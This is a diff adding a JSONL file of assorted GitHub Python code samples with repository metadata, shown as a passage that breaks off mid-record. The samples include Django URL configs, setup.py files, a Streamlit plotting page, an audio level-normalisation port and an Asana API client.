diff --git "a/1226.jsonl" "b/1226.jsonl" new file mode 100644--- /dev/null +++ "b/1226.jsonl" @@ -0,0 +1,230 @@ +{"seq_id": "30452862837", "text": "import base64\nimport json\n\n\nbrushes = dict(\n round_bitmap_brush = [\"round_brush_16.png\", ],\n poke_brush = [\"pokebrush.png\", ],\n painterly_brush = [\"RGBA anim 01.png\", \"RGBA anim 02.png\", \"RGBA anim 03.png\", \"RGBA anim 04.png\"],\n)\n\nbrushes_as_strings = {}\nfor key, value in brushes.items():\n images = []\n for image_name in value:\n with open(image_name, \"rb\") as image_file:\n prefix = f'data:image/png;base64,'\n data = base64.b64encode(image_file.read()).decode('utf-8')\n brushes_as_strings[image_name] = prefix + data\n\njson_object = json.dumps(brushes_as_strings, indent=4)\n\nwith open('base_64_brushes', 'w', encoding='utf-8') as file:\n file.write('brush_textures = ' + json_object)\n", "repo_name": "pokepetter/taptapir_projects", "sub_path": "otosopp/assets/brush_generator.py", "file_name": "brush_generator.py", "file_ext": "py", "file_size_in_byte": 740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "base64.b64encode", "line_number": 17, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "30600901662", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('trails/', views.TrailList.as_view(), name='index'),\n path('trails/mytrails', views.my_trails, name=\"my_trails\"),\n path('trails//', views.trails_detail, name='detail'),\n path('trails/create/', views.TrailCreate.as_view(), name='trails_create'),\n path('trails//update/', views.TrailUpdate.as_view(), name='trails_update'),\n path('trails//delete/', views.TrailDelete.as_view(), name='trails_delete'),\n path('trails//add_comment/', views.add_comment, name='add_comment'),\n path('comments//update/', views.CommentUpdate.as_view(), name='comments_update'),\n path('trails//delete_comment//', views.delete_comment, name='comments_delete'),\n path('search/amenities', views.AmenitiesSearchResults.as_view(), name='amenities_search_results'),\n path('search/trails', views.TrailsSearchResults.as_view(), name='trails_search_results'),\n path('accounts/signup/', views.signup, name='signup'),\n\n]", "repo_name": "awojdyla89/Happy-Trails", "sub_path": "main_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "28440613664", "text": "from setuptools import setup, find_packages\nfrom pathlib import Path\n\nNAME = 'oxtree'\nDESCRIPTION = 'A Handy Script to view Directory Tree Structure'\nTAG = ['tree', 'folder']\nREQUIREMENT = ['oxflags']\n\nVERSION = '0.0.1'\nLONG_DESCRIPTION = (Path(__file__).parent / \"README.md\").read_text()\n\nsetup(\n name=NAME,\n version=VERSION,\n author=\"0x68616469\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n\t\tlong_description=LONG_DESCRIPTION, \n\t\tpackages=find_packages(),\n install_requires=REQUIREMENT,\n keywords=TAG,\n entry_points = {'console_scripts': ['oxtree = oxtree:main']},\n classifiers=[\n\t \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)", "repo_name": "0x68616469/oxtree", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "43625182208", "text": "import setuptools\nimport os\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='snapper-ml',\n version=os.environ.get('PROJECT_VERSION', '0.1.0'),\n author=\"Antonio Molner Domenech\",\n author_email=\"antonio.molner@correo.ugr.es\",\n description=\"A framework for reproducible machine learning\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/SnapperML/SnapperML\",\n packages=setuptools.find_packages(),\n entry_points={\n 'console_scripts': ['snapper-ml=snapper_ml.scripts.run_experiment:app'],\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n install_requires=[\n 'docker>=4.1.0',\n 'EasyProcess>=0.2.10',\n 'mlflow>=1.11.0',\n 'gorilla>=0.3.0',\n 'optuna>=1.1.0',\n 'docstring-parser>=0.6',\n 'pydantic>=1.4',\n 'python-dotenv>=0.10.3',\n 'ray>=0.8.2',\n 'PyYAML>=5.1.2',\n 'pytictoc>=1.5.0',\n 'coloredlogs>=10.0',\n 'py-cpuinfo>=5.0.0',\n 'typer>=0.1.1',\n 'pystache',\n 'shellingham',\n 'colorama',\n 'numpy'\n ],\n dependency_links=['https://github.com/SnapperML/knockknock.git@master#egg=knockknock']\n)\n", "repo_name": "SnapperML/SnapperML", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "86", "api": [{"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "17899149261", "text": "import logging\n\n# Build and config the logger\nlogging.basicConfig(filename = \"main.log\",\n format = \"%(asctime)s %(message)s\",\n filemode = \"w\")\n\n# set an object for the logger\nnew_logger = logging.getLogger()\n\n# set threshold to debug\nnew_logger.setLevel(logging.DEBUG)\n\n# Test Messages for that log\nnew_logger.debug(\"This is a Harmless debug message\")\nnew_logger.info(\"Information message\")\nnew_logger.warning(\"A warning message\")\nnew_logger.error(\"This is an error message\")\nnew_logger.critical(\"No Internet, Internet is down now\")", "repo_name": "LucianPopaLVP/practice-projects", "sub_path": "basics/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.basicConfig", "line_number": 4, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 12, "usage_type": "attribute"}]} +{"seq_id": "11845188703", "text": "import pandas as pd\nfrom abstra.dashes import redirect, get_user\n\ncsv_data = 'credit_analysis_data.csv'\ndf = pd.read_csv(csv_data)\n\n# convert columns created_at and updated_at to formated date as sstring\ndf['created_at'] = pd.to_datetime(df['created_at'], unit='s').dt.strftime('%Y/%m/%d %H:%M:%S')\ndf['updated_at'] = pd.to_datetime(df['updated_at'], unit='s').dt.strftime('%Y/%m/%d %H:%M:%S')\n\n\ndef handle_table_action(event):\n payload = event.get('payload')\n action = payload.get('action')\n\n if action != 'Edit':\n return\n\n data = payload.get('data')\n \n redirect('/credit_request', {\"id\": data.get('request_id')})", "repo_name": "abstra-app/dashes-examples", "sub_path": "credit-request-admin/credit_requests.py", "file_name": "credit_requests.py", "file_ext": "py", "file_size_in_byte": 623, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 9, "usage_type": "call"}, {"api_name": "abstra.dashes.redirect", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "1529581975", "text": "from pathlib import Path\nimport argparse\n\ndef evaluate_ctm(ref_ctm, hyp_ctm, word):\n\n print(word)\n\n # setting paths\n ref_ctm_path = Path(ref_ctm)\n hyp_ctm_path = Path(hyp_ctm)\n\n # read ctm files\n ref_ctm = [x.split() for x in open(ref_ctm_path, 'r', encoding='utf-8').read().split('\\n') if x]\n ref_ctm = [{'segment_id': s[0], 'channel': s[1], 'start': float(s[2]), 'duration': float(s[3]), 'word': s[4].lower()}\n for s in ref_ctm if s[4].lower() == word.lower()]\n\n hyp_ctm = [x.split() for x in open(hyp_ctm_path, 'r', encoding='utf-8').read().split('\\n') if x]\n hyp_ctm = [{'segment_id': s[0], 'channel': s[1], 'start': float(s[2]), 'duration': float(s[3]), 'word': s[4].lower()}\n for s in hyp_ctm if s[4].lower() == word.lower()]\n\n tp = 0\n fp = 0\n fn = 0\n\n for ref_w in ref_ctm:\n w_found = False\n for hyp_w in hyp_ctm:\n if ref_w['segment_id'] == hyp_w['segment_id']:\n if abs(hyp_w['start'] - ref_w['start']) < hyp_w['duration']:\n tp += 1\n w_found = True\n if not w_found:\n fn += 1\n\n for hyp_w in hyp_ctm:\n w_found = False\n for ref_w in ref_ctm:\n if ref_w['segment_id'] == hyp_w['segment_id']:\n if abs(hyp_w['start'] - ref_w['start']) < hyp_w['duration']:\n w_found = True\n if not w_found:\n fp += 1\n\n\n print(f'TP {tp}\\n')\n print(f'FP {fp}\\n')\n print(f'FN {fn}\\n')\n\n\nif __name__ == '__main__':\n # argument parser\n parser = argparse.ArgumentParser()\n parser.add_argument('-ref', '--ref_ctm_path', required=True, type=Path,\n help='Path to ref ctm file')\n parser.add_argument('-hyp', '--hyp_ctm_path', required=True, type=Path,\n help='Path to hyp ctm file')\n parser.add_argument('-hw', '--hot_word', required=True, type=str,\n help='Hot word to be detected')\n\n # parse\n script_args = parser.parse_args()\n\n evaluate_ctm(script_args.ref_ctm_path, script_args.hyp_ctm_path, script_args.hot_word)\n", "repo_name": "kosti4ka/ukroASR", "sub_path": "kws_evaluation.py", "file_name": "kws_evaluation.py", "file_ext": "py", "file_size_in_byte": 2142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 9, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 52, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 53, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "11678852444", "text": "import streamlit as st\nimport pandas as pd\nimport os\nimport matplotlib\nmatplotlib.use('Agg')\nimport seaborn as sns\n\ndef app():\n if 'main_data.csv' not in os.listdir('data'):\n st.markdown(\"Please upload data through `Upload Data` page!\")\n \n else:\n df = pd.read_csv('data/main_data.csv')\n\n # Plot and Visualization\n\n st.subheader(\"Data Visualization\")\n # Correlation\n\t # Seaborn Plot\n if st.checkbox(\"Correlation Plot[Seaborn]\"):\n st.write(sns.heatmap(df.corr(),annot=True))\n st.pyplot()\n \n # Pie Chart\n if st.checkbox(\"Pie Plot\"):\n all_columns_names = df.columns.tolist()\n if st.button(\"Generate Pie Plot\"):\n st.success(\"Generating A Pie Plot\")\n st.write(df.iloc[:,-1].value_counts().plot.pie(autopct=\"%1.1f%%\"))\n st.pyplot()\n\n # Count Plot\n if st.checkbox(\"Plot of Value Counts\"):\n st.text(\"Value Counts By Target\")\n all_columns_names = df.columns.tolist()\n primary_col = st.selectbox(\"Primary Columm to GroupBy\",all_columns_names)\n selected_columns_names = st.multiselect(\"Select Columns\",all_columns_names)\n if st.button(\"Plot\"):\n st.text(\"Generate Plot\")\n if selected_columns_names:\n vc_plot = df.groupby(primary_col)[selected_columns_names].count()\n else:\n vc_plot = df.iloc[:,-1].value_counts()\n st.write(vc_plot.plot(kind=\"bar\"))\n st.pyplot()\n\n", "repo_name": "anubhav0809/Data_Explorer", "sub_path": "pages/plot_vis.py", "file_name": "plot_vis.py", "file_ext": "py", "file_size_in_byte": 1596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "matplotlib.use", "line_number": 5, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 9, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 17, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 21, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 21, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.multiselect", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 39, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 44, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "2470656953", "text": "'''\nLendo, escrevendo e apagando arquivos no Python\n'''\n\n## CRIANDO ARQUIVO\n\n# file = open('abc.txt', 'w+')\n# file.write('Linha 1\\n')\n# file.write('Linha 2\\n')\n# file.write('Linha 3\\n')\n# file.write('Linha 4\\n')\n#\n# file.seek(0,0) ## buscando a posição no arquivo (onde o cursor estar) voltar ao topo do arquivo\n# print('Lendo linhas: ')\n# print(file.read())\n# print('################################')\n#\n# file.seek(0,0)\n# print(file.readline())\n# print(file.readline())\n# print(file.readline())\n#\n# print('################################')\n# file.seek(0,0)\n# for linha in file.readlines():\n# print(linha, end='')\n#\n# print('################################')\n# file.seek(0,0)\n# for linha in file:\n# print(linha)\n#\n# file.close()\n\n## utilizando a maneira de contexto eu não preciso fechar o arquivo\n#\n# with open('abc.txt','w+') as file:\n# file.write('Linha 1\\n')\n# file.write('Linha 2\\n')\n# file.write('Linha 3\\n')\n#\n# file.seek(0)\n# print(file.read())\n\n\n## utilizando o r+ para ler os arquivos\n\n# with open('abc.txt', 'r+') as file:\n# print(file.read())\n\n## utilizando o a+: ele ativa o append mode (adiciona coisas ao arquivo)\n\n# with open('abc.txt', 'a+') as file:\n# file.write('Outra linha\\n')\n# file.seek(0)\n# print(file.read())\n\n## apagando arquivo\n\n# import os\n# os.remove('abc.txt')\n\n## lendo json\n\nimport json\n\nd1 = {\n 'Pessoa 1' : {\n 'nome': 'Luiz',\n 'idade' : 25,\n },\n 'Pessoa 2' : {\n 'nome' : 'Luisa',\n 'idade': 30,\n },\n}\n\nd1_json = json.dumps(d1, indent=True)\nwith open('abc.json', 'w+') as file:\n file.write(d1_json)\n", "repo_name": "JoyDantas/cursopython", "sub_path": "modulo_02/aula18.py", "file_name": "aula18.py", "file_ext": "py", "file_size_in_byte": 1624, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dumps", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "33994524906", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#/* v3.5 02.Feb.10\n# ============================================================================\n#\n# SV56DEMO.C\n# ~~~~~~~~~~\n#\n# Description:\n# ~~~~~~~~~~~~\n#\n# Example program that calculates the factor for equalizing, and\n# equalizes, a file's active speech level \"NdB\" dBs below a 0 dB\n# reference. Here, the default reference is 0 dB below system overload.\n# This program, as an option, may normalize the output file using the \n# measure RMS (long term) level, instead of the active speech level.\n#\n# The calculation of speech file's active power uses the algorithm\n# in ITU-T Recommendation P.56, and as a by-product of\n# this mudule, also calculates the activity [%], RMS power,\n# positive and negative peaks for the file, and peak factors.\n#\n# In general, input and output files are in integer represent-\n# ation, 16-bit words, 2's complement. In UGST convention, this\n# data must be left-adjusted, RATHER than right-adjusted. Since\n# the speech voltmeter uses `float' input data, it is necessary to\n# convert from short (in the mentioned format) to float; this is\n# carried out by the function `sh2fl()'. This function has the\n# option of `normalize' the input data to the range -1..+1, what\n# is done. After the equalization factor is found, the function\n# `scale()' is called to carry out the equalization using single\n# (rather than double) float precision. After equalized, data need\n# to be converted back to integer (short, right-justified). This\n# is done by function `fl2sh()', using: truncation, no\n# zero-padding of the least significant bits, left-justification\n# of data, hard-clipping of data outside the range -32768..+32767.\n# After that, data is saved to file.\n#\n# The default values for the AD,DA systems resolution is 16\n# bits, for the sampling rate is 16000 Hz. To change this\n# on-line, just specify the parameters 6 and/or 7 conveniently\n# in the command line. For example, 14 bits and 8000 Hz:\n# $ sv56demo filein fileout 256 1 100 -15 8000 14 \n#\n# Usage:\n# ~~~~~~\n# $ sv56demo [-options] FileIn FileOut \n# [BlockSize [1stBlock [NoOfBlocks [DesiredLevel\n# [SampleRate [Resolution] ] ] ] ] ]\n# where:\n# FileIn is the input file to be analysed and equalized;\n# FileOut is the output equalized file\n# BlockSize is the block size in number of samples;\n# 1stBlock the first block to be analysed/equalized\n# NoOfBlocks number of blocks to be analysed/equalized\n# DesiredLevel level desired to the output file, in dBov or dBm0\n# SampleRate sampling rate used for acquiring/generating the\n# file, in Hertz; default is 16000 Hz; THIS PARAMETER\n# IS OPTIONAL!\n# Resolution the digital system resolution (AD,DA systems), in\n# number of bits; default to 16 bits; THIS PARAMETER\n# IS OPTIONAL, but to specify it you need to specify\n# the former one!\n# Options:\n# ~~~~~~~~\n# -bits n ........ change the default word length to n bits; equivalent\n# to parameter Resolution above [default: 16 bits]\n# -lev ndB ....... equivalent to specifying DesiredLevel above, just that\n# here do not need to specify the former 3 parameters.\n# -log file ...... print the statistics log into file rather than stdout\n# -q ............. quit operation - does not print the progress flag. \n# Saves time and avoids trash in batch processings.\n# -qq ............ print short statistics summary; no progress flag.\n# -rms ........... normalizes the output file using the RMS long-term level, \n# instead of the active speech level.\n# -sf f .......... set sampling frequency to `f' Hz; equivalent to parameter \n# SampleRate above.\n# -blk len ...... is the block size in number of samples;\n# this parameter is optional, and the default is block size\n#\t of 256 samples; equivalent to parameter N above\n# -start sb ...... define `sb' as the first block to be measured; equivalent \n# to parameter N1 above [default: first block of the file] \n# -end eb ........ define `eb' as the last block to be measured\n# -n nb .......... define `nb' as the number of blocks to be measured; \n# equivalent to parameter N2 above [default: whole file]\n#\n# Modules used:\n# ~~~~~~~~~~~~~\n# > sv-P56.c: contains the functions related to active speech\n# level measurement according to P.56,\n# init_speech_voltmeter(), speech_voltmeter() and \n# bin_interp(). Their prototypesare in `sv-p56.h'.\n# > ugst-utl.c: utility functions; here are used the gain/loss\n# (scaling) algorithm of scale() and the data type\n# conversion functions sh2fl() and fl2sh(). Prototypes \n# are in `ugst-utl.h'.\n#\n# Exit values:\n# ~~~~~~~~~~~~\n# 0 success (all but VMS);\n# 1 success (only in VMS);\n# 2 error opening input file;\n# 3 error creating output file;\n# 4 error moving pointer to desired start of conversion;\n# 5 error reading input file;\n# 6 error writing to file;\n#\n# Compilation:\n# ~~~~~~~~~~~~\n# VaxC: cc sv56demo.c \n# link sv56demo\n# TurboC: tcc sv56demo.c\n# Sun-OS: cc -o sv56demo sv56demo.c -lm \n#\n# Author: \n# ~~~~~~~ \n# Simao Ferraz de Campos Neto\n# DDS/Pr11 Tel: +55-192-39-1396 \n# CPqD/Telebras Fax: +55-192-53-4754 \n# 13085-061 Campinas SP Brazil E-mail: \n#\n# Log of changes:\n# ~~~~~~~~~~~~~~~\n# 09.Mar.90 0.0 Release of first version of a C speech\n# voltmeter.\n# 08.Oct.91 1.0 Release of demo program for the speech\n# voltmeter module.\n# 19.Feb.92 2.0 Call to module using state variable instead of\n# individual variables. Compilation option \n# between dB(overload) and dBm0.\n# 18.May.92 2.1 Removed references to dBm0; input data\n# is converted to the normalized range; \n# speech voltmeter needs input data in\n# normalized range. \n# 10.Dec.94 3.0 Included additional input interface. NdB promoted\n# from long to double. \n# 21.Aug.95 3.1 Included additional option to normalize output\n# file using RMS long-term level instead of active \n# level, and options for block size, first block, \n# last block, number of blocks. \n# 29.May.97 3.2 moved summary statistics code to a function, and\n# created a short summary function as well. Added\n# command-line option to print short summary\n# (-qq). Add -log option so save statistical\n# summaries into a file \n# 06.Apr.98 3.3 solved small bug that occurred when the file \n# size was not a multiple of the frame\n# size. The program was truncating the output\n# file size to a multiple of the current\n# block size. The fix was to introduce a\n# ceil() in the calculation of N2 when N2==0\n# \n# 08.Jul.99 3.4 fixed a bug in fwrite() call in main(); was \n# saving N samples, rather than \"l\". This was\n# causing more samples to be written to the\n# end of the file when the file size was not\n# a multiple of the block size .\n# 02.Feb.10 3.5 Modified maximum string length to avoid\n# buffer overruns (y.hiwasaki)\n#\n# ============================================================================\n#*/\n\nimport os\nimport math\nimport argparse\nfrom ctypes import sizeof, c_short\n\nimport numpy as np\n\nfrom svp56 import SVP56_state, bin_interp, init_speech_voltmeter, speech_voltmeter\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(prog='sv56demo', add_help=True)\n parser.add_argument('FileIn', help='the input file to be analysed and equalized')\n parser.add_argument('FileOut', help='the output equalized file')\n \n args = parser.parse_args()\n\n # Parameters for operation \n N=256\n N1=0\n N2=0\n NdB=-26 # dBov\n\n # Intermediate storage variables for speech voltmeter\n state = SVP56_state()\n\n # Other variables\n quiet=0\n use_active_level = 1\n long_summary = 1\n NrSat = 0\n start_byte = 0\n bitno = 16\n sf = 16000\n factor = 0.0\n ActiveLeveldB = None\n DesiredSpeechLeveldB = None\n\n # ......... SOME INITIALIZATIONS .........\n start_byte = N1\n start_byte *= N * sizeof(c_short)\n\n # Check if is to process the whole file\n if N2 == 0:\n st = os.stat(args.FileIn)\n N2 = math.ceil((st.st_size - start_byte) / (N * sizeof(c_short)))\n \n # Overflow (saturation) point\n Overflow = math.pow(2.0, (bitno-1))\n\n init_speech_voltmeter(state, sf)\n print(state)\n # Opening input file\n Fi = None\n with open(args.FileIn, 'rb') as fid:\n Fi = np.fromfile(fid, dtype=np.int16)\n Fi = Fi.astype(np.float32) / np.iinfo(np.int16).max\n\n index = 0\n for i in range(0, N2):\n index = i * N\n\n ActiveLeveldB = speech_voltmeter(Fi[index:min(index+N, len(Fi))], state)\n\n # ... COMPUTE EQUALIZATION FACTOR ... \n DesiredSpeechLeveldB = float( NdB )\n if use_active_level:\n factor = math.pow(10.0, (DesiredSpeechLeveldB-ActiveLeveldB) / 20.0)\n else:\n factor = math.pow(10.0, (DesiredSpeechLeveldB-SVP56_get_rms_dB(state)) / 20.0)\n\n #\n # EQUALIZATION: hard clipping (with truncation)\n #\n\n # Get data of interest, equalize and de-normalize\n Fo = Fi * factor\n Fo = (Fo * np.iinfo(np.int16).max).astype(np.int16)\n with open(args.FileOut, 'wb') as fid:\n Fo.tofile(fid)\n\n", "repo_name": "odorumaharaja/svp56", "sub_path": "sv56demo.py", "file_name": "sv56demo.py", "file_ext": "py", "file_size_in_byte": 10452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 176, "usage_type": "call"}, {"api_name": "svp56.SVP56_state", "line_number": 189, "usage_type": "call"}, {"api_name": "ctypes.sizeof", "line_number": 205, "usage_type": "call"}, {"api_name": "ctypes.c_short", "line_number": 205, "usage_type": "argument"}, {"api_name": "os.stat", "line_number": 209, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 210, "usage_type": "call"}, {"api_name": "ctypes.sizeof", "line_number": 210, "usage_type": "call"}, {"api_name": "ctypes.c_short", "line_number": 210, "usage_type": "argument"}, {"api_name": "math.pow", "line_number": 213, "usage_type": "call"}, {"api_name": "svp56.init_speech_voltmeter", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 220, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 221, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 221, "usage_type": "attribute"}, {"api_name": "svp56.speech_voltmeter", "line_number": 227, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 232, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.iinfo", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 242, "usage_type": "attribute"}]} +{"seq_id": "36949984921", "text": "import json\nimport requests as r\nimport time\n\n\ndef asana_client(method, url, **kwargs):\n backoff_seconds = 0.500\n retryError = 429\n attempt = 0\n\n base_url = \"https://app.asana.com/api/1.0\"\n full_url = base_url + url\n\n if \"data\" in kwargs:\n data = json.dumps(kwargs[\"data\"])\n else:\n data = {}\n\n if \"params\" in kwargs:\n params = kwargs[\"params\"]\n else:\n params = {}\n\n headers = {\"Authorization\": \"Bearer \" + kwargs[\"token\"]}\n\n result = False\n\n while ((retryError == 429) or (retryError == 500)) and (attempt < 10):\n # pause execution before trying again\n\n if attempt == 6:\n print(\"hitting rate limits. slowing down calls...\")\n\n if attempt == 8:\n print(\"thanks for your patience. still slow.\")\n\n try:\n response = r.request(\n method, url=full_url, data=data, params=params, headers=headers\n )\n retryError = response.status_code\n\n if retryError >= 400:\n if (response.status_code != 429) and (response.status_code != 500):\n error_json = response.json()\n print(error_json[\"errors\"][0][\"message\"])\n print(\"HTTP Error: \", response.status_code)\n return False\n else:\n response_content = response.json()\n return response_content\n\n except r.HTTPError as e:\n if (response.status_code != 429) and (response.status_code != 500):\n print(\"HTTP Error: \", response.status_code)\n error_json = response.json()\n print(error_json[\"errors\"][0][\"message\"])\n return False\n\n # Exponential backoff in seconds = constant * attempt^2\n retry_time = backoff_seconds * attempt * attempt\n\n print(\n f\"The script is hitting rate limits (too many calls/minute). Waiting for {retry_time} seconds before continuing\"\n )\n time.sleep(retry_time)\n attempt += 1\n\n if attempt >= 10:\n print(\"too many requests hit rate limits - timed out\")\n\n return result\n", "repo_name": "Asana-Technical-Services/Mass-Update-Teams", "sub_path": "teamupdate/asanaUtils/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 2158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dumps", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 53, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "6332496326", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"home/\", views.home, name=\"home\"),\n path(\"books/\", views.books, name=\"books\"),\n path(\"book//\", views.book, name=\"book\"),\n path('login/', views.log_in, name='login'),\n path('logout/', views.log_out, name='logout'),\n path('register/', views.register, name='register'),\n]\n\n", "repo_name": "fedarenka/mysite", "sub_path": "books/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "37650896590", "text": "from .RedisDriver import RedisDriver\nfrom datetime import datetime, timedelta\n\n\nclass ShotTimeCalculator:\n def __init__(self):\n self.shot_times = []\n self.redis = RedisDriver()\n self.days = {\n 'monday': 0,\n 'tuesday': 1,\n 'wednesday': 2,\n 'thursday': 3,\n 'friday': 4,\n 'saturday': 5,\n 'sunday': 6,\n }\n \n def calculate_shot_times(self):\n self.__get_settings_or_default()\n self.__make_nice_start_time()\n\n actual_time = datetime.now().replace(tzinfo=None).astimezone(tz=None)\n\n if actual_time.weekday() in self.shot_days:\n self.shot_times = []\n\n if self.start_time > actual_time:\n self.shot_times.append(self.start_time)\n\n time_counter = self.start_time\n\n while time_counter < self.stop_time:\n time_counter += self.interval\n if time_counter > 